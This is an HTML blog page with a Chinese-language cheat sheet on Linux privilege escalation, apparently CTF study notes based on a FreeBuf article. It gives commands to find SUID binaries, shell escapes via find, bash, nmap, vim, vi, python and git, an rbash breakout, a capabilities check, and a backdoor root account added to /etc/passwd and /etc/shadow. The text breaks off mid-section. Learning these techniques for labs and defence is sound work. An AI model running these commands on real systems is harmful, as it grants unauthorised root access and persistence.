<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Saofe1a">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/04/07/linux提权/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="Linux提权姿势总结|原创 - FreeBuf网络安全行业门户 （禁用js） 提权后 cd &#x2F;root 分析是否可以sudo提权一般使用这个方式先进行验证，如果存在可以密码使用的命令，在加以利用sudo -l SUID提权查找SUID文件 123find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;nullfind &#x2F; -perm -u&#x3D;s -t">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux提权">
<meta property="og:url" content="http://example.com/2025/04/07/Linux%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Linux提权姿势总结|原创 - FreeBuf网络安全行业门户 （禁用js） 提权后 cd &#x2F;root 分析是否可以sudo提权一般使用这个方式先进行验证，如果存在可以密码使用的命令，在加以利用sudo -l SUID提权查找SUID文件 123find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;nullfind &#x2F; -perm -u&#x3D;s -t">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picx.zhimg.com/v2-6657d10215e488e57fd8f0c14b249ac3_r.jpg">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-83539994a1b925b545d8c51ce7a9008c_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-22f6b2b66e93f100d16de881e1ab3c79_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-0a1528743cfa87e5643d1e5464497f3c_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-b0d04f1c2f4feaf232909040c693f4a9_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-ffb670598a37a001783fed469c8706ac_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-2d82f71bd4192f8d417bce0e6bf7f947_1440w.webp">
<meta property="og:image" content="https://pic2.zhimg.com/80/v2-f539eee7a6410329e7719945c74cbde5_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-1dbd5ce6af6b54da496314dcb294f49d_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-618c84a8e5601bc8db7a4022a9a9bac3_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-2eaa3a1ac1706a44aa24d7c256febb1e_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-e87bd9181eaf792408b187f13d0cff5c_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-1e04f822fd5ba0f2e03121f27e74c707_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-a709db1a19ea3364e51d1af4d7b1e1de_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-1dbd5ce6af6b54da496314dcb294f49d_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-def315f69e27411a85f11c8ec615d0a0_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-d387882161490ea9483c4c017db6da38_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-ae17e4d155594c477ca6ea2c7adce42d_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-6c78fd6037740c72b0d3e31b7fd3863a_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-9f7d27bc8c4b33204e7c6298f09a232d_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-d26c8b521276df559285faca4f18615c_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-bf885fd5fcf270318230f4254bca5ddc_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-092a4caec3e657c6de7e015ff97b82db_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-2d8c4518a6cbff5d3f7c92796e8a1de1_1440w.webp">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-d0424e4f7b8f5bced9168c55b0612c2f_1440w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-88018808b5a86b275d6ec571134d9910_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-a9bf252bcfe338eb415d012c1ed2c91f_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-d641df843ac6f68f3162271a2078067c_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-51cc27ba394a69fc8f3ccb590971c884_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-44424913e82a1290f7f22211c3fe57ca_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-64f336ffb89a508cfecf90dc93105c22_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-32c13fb82f07f3cfe3285dcc88f60514_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-95269d0618128d2448eb6c2742298ed7_1440w.webp">
<meta property="og:image" content="https://pic4.zhimg.com/80/v2-bb99468d40ec0066426f171077c5493f_1440w.webp">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-8d03c5622667bcc0c28e52a1ec0a993c_1440w.webp">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-eed51261147021ec2adabe526e04e93c_1440w.webp">
<meta property="article:published_time" content="2025-04-07T02:54:06.502Z">
<meta property="article:modified_time" content="2025-04-07T02:51:55.895Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picx.zhimg.com/v2-6657d10215e488e57fd8f0c14b249ac3_r.jpg">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/chelsea.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/chelsea.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/chelsea.png">
    <!--- Page Info-->
    
    <title>
        
            Linux提权 -
        
        Saofe1a
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    

    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Saofe1a","subtitle":{"text":["Better late than never","感谢所有在CTF道路上帮助过我的师傅们","Man proposes,God disposes"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.4","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives/","icon":"fa-regular fa-archive"},"About":{"path":"/about/","icon":"fa-regular fa-user"},"Links":{"path":"/links/","icon":"fa-regular fa-link"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Saofe1a
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Saofe1a
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives/"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/about/"
                                        >
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/links/"
                                        >
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives/"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/about/"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-regular fa-user fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/links/"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-regular fa-link fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">11</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Linux提权</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/touxiang.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">Saofe1a</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-04-07 10:54:06</span>
        <span class="mobile">2025-04-07 10:54:06</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-04-07 10:51:55</span>
            <span class="mobile">2025-04-07 10:51:55</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>1.7k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>6 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p><a class="link"   href="file:///C:/Users/Geng/Desktop/%E7%9F%A5%E8%AF%86%E5%BA%93/Linux%E6%8F%90%E6%9D%83%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93_%E5%8E%9F%E5%88%9B%20-%20FreeBuf%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%A1%8C%E4%B8%9A%E9%97%A8%E6%88%B7.html" >Linux提权姿势总结|原创 - FreeBuf网络安全行业门户 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>（禁用js）</p>
<p>提权后 cd &#x2F;root</p>
<p>分析是否可以sudo提权一般使用这个方式先进行验证，如果存在可以密码使用的命令，在加以利用<br><code>sudo -l</code></p>
<h1 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h1><p>查找SUID文件</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -4000 -print 2&gt;/dev/null</span><br><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -exec ls &#123;&#125; \; 2&gt;/dev/null</span><br></pre></td></tr></table></figure></div>

<p>具有suid权限的二进制可执行文件有</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">nmap</span><br><span class="line">vim</span><br><span class="line">find</span><br><span class="line">bash</span><br><span class="line">more</span><br><span class="line">less</span><br><span class="line">nano</span><br><span class="line">cp</span><br><span class="line">awk</span><br><span class="line">mv</span><br><span class="line">exim  要searchsploit来利用</span><br></pre></td></tr></table></figure></div>
<p>查找额外的具有suid权限的文件<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/v2-6657d10215e488e57fd8f0c14b249ac3_r.jpg"
                     
                ><br>ls一下看看是否设置了suid权限<br><code>ls -al /usr/bin/su</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-83539994a1b925b545d8c51ce7a9008c_1440w.webp"
                     
                ><br>-rwsr-xr-xz中的s代表suid权限，可以看到确实设置了suid权限</p>
<p>设置suid权限<br><code>chmod u+s /usr/bin/find</code></p>
<h3 id="利用find提权"><a href="#利用find提权" class="headerlink" title="利用find提权"></a>利用find提权</h3><p><strong>这里的前提都是要有suid权限</strong></p>
<h4 id="find有无suid权限均可"><a href="#find有无suid权限均可" class="headerlink" title="find有无suid权限均可"></a>find有无suid权限均可</h4><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">find 具有suid权限的filename -exec whoami \; -quit</span><br><span class="line">#root</span><br><span class="line">find 具有suid权限的filename -exec /bin/sh -p \; -quit</span><br><span class="line">#whoami</span><br><span class="line">#root</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-22f6b2b66e93f100d16de881e1ab3c79_1440w.webp"
                     
                ></p>
<h4 id="find要有suid权限"><a href="#find要有suid权限" class="headerlink" title="find要有suid权限"></a>find要有suid权限</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-0a1528743cfa87e5643d1e5464497f3c_1440w.webp"
                     
                ></p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">touch anyfile #必须要有这个文件</span><br><span class="line">find anyfile -exec whoami \;</span><br><span class="line">find / -exec “/bin/bash” -p ;</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-b0d04f1c2f4feaf232909040c693f4a9_1440w.webp"
                     
                ></p>
<h3 id="利用bash提权"><a href="#利用bash提权" class="headerlink" title="利用bash提权"></a>利用bash提权</h3><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-ffb670598a37a001783fed469c8706ac_1440w.webp"
                     
                ><br><code>bash -p</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-2d82f71bd4192f8d417bce0e6bf7f947_1440w.webp"
                     
                ></p>
<h3 id="nmap提权"><a href="#nmap提权" class="headerlink" title="nmap提权"></a>nmap提权</h3><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">TF=$(mktemp)</span><br><span class="line">echo &#x27;os.execute(&quot;/bin/sh&quot;)&#x27; &gt; $TF</span><br><span class="line">sudo nmap --script=$TF</span><br></pre></td></tr></table></figure></div>

<h3 id="利用vim提权"><a href="#利用vim提权" class="headerlink" title="利用vim提权"></a>利用vim提权</h3><p>第一种方式，利用vim添加账号</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/passwd 添加特权用户</span><br><span class="line">添加：bob:x:0:0::/home/bob:/bin/bash</span><br><span class="line">vim /etc/shadow 添加特权用户</span><br><span class="line">bob:$1$salt$638tR8bROOvPnPklDQ9Vf/:19103:0:99999:7::: 密码是123456</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic2.zhimg.com/80/v2-f539eee7a6410329e7719945c74cbde5_1440w.webp"
                     
                ></p>
<p>第二种，利用vim打开交互shell<br><code>vim -c &#39;:py import os; os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-pc&quot;, &quot;reset; exec sh -p&quot;)&#39;</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-1dbd5ce6af6b54da496314dcb294f49d_1440w.webp"
                     
                ></p>
<h3 id="rbash环境下提权"><a href="#rbash环境下提权" class="headerlink" title="rbash环境下提权"></a>rbash环境下提权</h3><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">BASH_CMDS[a]=/bin/sh;a</span><br><span class="line">export PATH=$PATH:/bin/</span><br><span class="line">export PATH=$PATH:/usr/bin</span><br><span class="line">echo /*</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-618c84a8e5601bc8db7a4022a9a9bac3_1440w.webp"
                     
                ></p>
<h3 id="利用vi提权"><a href="#利用vi提权" class="headerlink" title="利用vi提权"></a>利用vi提权</h3><p>vi随便打开文件<br>再下面添加<br>:set shell&#x3D;&#x2F;bin&#x2F;sh<br>:shell</p>
<h3 id="python提权"><a href="#python提权" class="headerlink" title="python提权"></a>python提权</h3><p><code>python -c &#39;import os; os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-p&quot;)&#39;</code></p>
<h3 id="利用git提取"><a href="#利用git提取" class="headerlink" title="利用git提取"></a>利用git提取</h3><p>一般情况下是查找SUID文件时，发现了sudo<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-2eaa3a1ac1706a44aa24d7c256febb1e_1440w.webp"
                     
                ><br><code>sudo -l</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-e87bd9181eaf792408b187f13d0cff5c_1440w.webp"
                     
                ><br>git是root权限,我们使用git提权</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(我们需要将shell的窗口变窄,使得回显信息不能一页显示)</span><br><span class="line">1、sudo git help config #在末行命令模式输入 </span><br><span class="line">!/bin/bash 或 !&#x27;sh&#x27; #完成提权 </span><br><span class="line">2、sudo git -p help </span><br><span class="line">!/bin/bash #输入!/bin/bash，即可打开一个用户为root的shell</span><br></pre></td></tr></table></figure></div>

<h1 id="Capabilities"><a href="#Capabilities" class="headerlink" title="Capabilities"></a>Capabilities</h1><p><code>getcap -r / 2&gt;/dev/null</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-1e04f822fd5ba0f2e03121f27e74c707_1440w.webp"
                     
                ><br>如果我们找到已经设置了cap_setuid的命令或者文件，可以通过使用<a class="link"   target="_blank" rel="noopener" href="https://gtfobins.github.io/#" >GTFObins <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> 的二进制文件列表来查找信息并尝试提升权限<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-a709db1a19ea3364e51d1af4d7b1e1de_1440w.webp"
                     
                ><br>这将启动一个如下所示的 root shell<br><img  
                     lazyload
                     src="/images/loading.svg"
